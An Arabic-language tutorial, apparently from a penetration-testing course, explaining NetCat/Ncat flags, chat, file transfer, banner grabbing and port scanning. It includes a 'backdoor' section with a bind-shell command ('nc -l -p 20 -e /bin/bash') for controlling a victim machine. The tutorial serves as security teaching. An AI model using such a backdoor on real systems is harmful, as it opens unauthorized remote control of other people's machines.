هية اداة بسيطة تقرأ بينات عبر بروتوكولات TCP و UDP
الـ NetCat اداة مفيدة جدا ومتعددة الاستخدامات، أطلق عليها إسم " Hackers Swiss Army Knife "
اول ظهور لها في عام 1995 التي صممها Hobbit
من ابسط استخداماتها انشاء اتصال TCP على بورت معين , وهي من أخطر أدوات التي يستخدمها الـ pentester
و قد أتت في المرتبة الرابعة في قائمة "Top 100 Network Security Tools"
من أهم ميزاتها :
1- يمكنك فحص المنافذ المفتوحة في اي هدف لكن الـ Nmap اقوا و اسرع
2- يمكن نقل ملفات بين جهاز وجهاز آخر
3- يمكن أيضاً ان تتصل كـمحادثة بينك وبين
4- استخراج معلومات عن السيرفر مثل نظام التشغيل او نسخة php يعني http method المستخدمة
5- تستخدم ك باكدور لتحكم في الجهاز الضحية الاستعمالات -c و -e للباكدور
-i مدة فحص الهدف
-l امر لتنصت على هدف معين
-n اذا كان لديك ال ip ضع -n , اذا كان لديك هوست ضع الهوست بدون n
-o لحفظ الحزم المارة
-p البورت الذي تريد التنصت عليه
-r فحص عشوائي
-v اظهار معلومات اضافية على الترمنال
* شرح استعمال رسائل
نكتب هذا الامر في الترمنال
nc -l -p 1000
بالجهاز التاني رح نتصل بالجهاز بالامر التالي
nc 192.168.0.0 port
وبعدها يتم الاتصال كـ مسنجر
* شرح ارسال ملف
مثال ملف يحوي باسورد أو صورة على سطح المكتب أمر الارسال هو
nc -l -p [port] < مسار الملف
-nc رمز الاداة
-l امر التنصت
-p البورت
-< مسار الملف
في الجهاز الثاني الامر التالي
nc ip_sender port > file.txt
* شرح معرفة معلومات اي سيرفر
nc google.com 80
ثم نكتب
GET / HTTP/1.1
User-Agent: mozzila
معلومات السيرفر اضغط مرتين على زر الـ Enter وتظهر معلومات السيرفر
* شرح فحص بورتات
ncat -z -v 127.0.0.1
-i يعني بين فحص بورت وبورت انتظر ثانية
-z لفحص البورت
-v اظهار البورتات المفتوحة فقط.
أما
-vv سظهر البورتات المفتوحة والمغلقة
ويمكن أيضاً تحديد فحص للبورتات بأن نضع 1-100 أي الفحص من بورت واحد إلى بورت مئة
ncat -z -v 127.0.0.1 1-100
* شرح عمل اداة كـ باكدور
nc -l -p 20 -e /bin/bash
الجهاز الآخر
/bin/bash
هذا مسار الترمنال الذي تتحكم به في الينكس
nc 192.168.1.102 20
* شرح فتح بورت وهمي بستخدام بورت معين
ncat --sh-exec "ncat example.org 80" -l 8080 --keep-open
الان شرح ڤيديو على الاداة مشاهدة ممتعة
الدرس السابع والعشرون دورة اختبار الاختراق شرح اداة Ncat
4/
5
Oleh
Moayad Almalat